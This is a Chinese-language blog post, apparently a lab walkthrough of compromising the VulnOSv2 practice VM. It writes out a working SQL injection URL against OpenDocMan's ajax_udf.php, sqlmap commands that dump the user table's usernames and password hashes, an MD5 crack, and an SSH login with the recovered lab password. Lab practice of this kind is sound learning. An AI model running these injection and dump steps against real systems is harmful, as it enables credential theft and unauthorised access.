很久没做网络安全相关的实践了,利用十一假期把之前下载的VulnOSv2搞一下,
需要Virtualbox才能打开,我给了一个hostonly的网卡,
首先要解决的是靶机地址是啥,既然知道hostonly的网段,装一个kali,做个主机扫描就可以了,
试了一下100无法ping通,101可以,则猜测100是dhcp服务,101是靶机,
继续对靶机进行服务扫描,
http服务开着,那就访问一下试试,
访问进去,发现是OpenDocMan应用,
在网上搜这个版本号的漏洞,
能做SQL注入,真是太好了,
先手工注一下,http://192.168.56.101/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,
然后用sqlmap自动注,先看有哪些数据库,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs,
再看看jabcd0cs数据库里有哪些表,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables,
再看看odm_user数据表里有哪些字段,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns,
最后再看看username和password字段的详细内容,sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump,
知道了webmin是一个用户,密码是md5的,需要破解一下,
访问http://md5decrypt.net/en/,
密码明文原来是webmin1980,
就可以远程ssh靶机了,
到这儿应该再继续实践提权,但是实践开始时忘了给访问公网的条件,留个尾巴,下次继续。
领取专属 10元无门槛券
私享最新 技术干货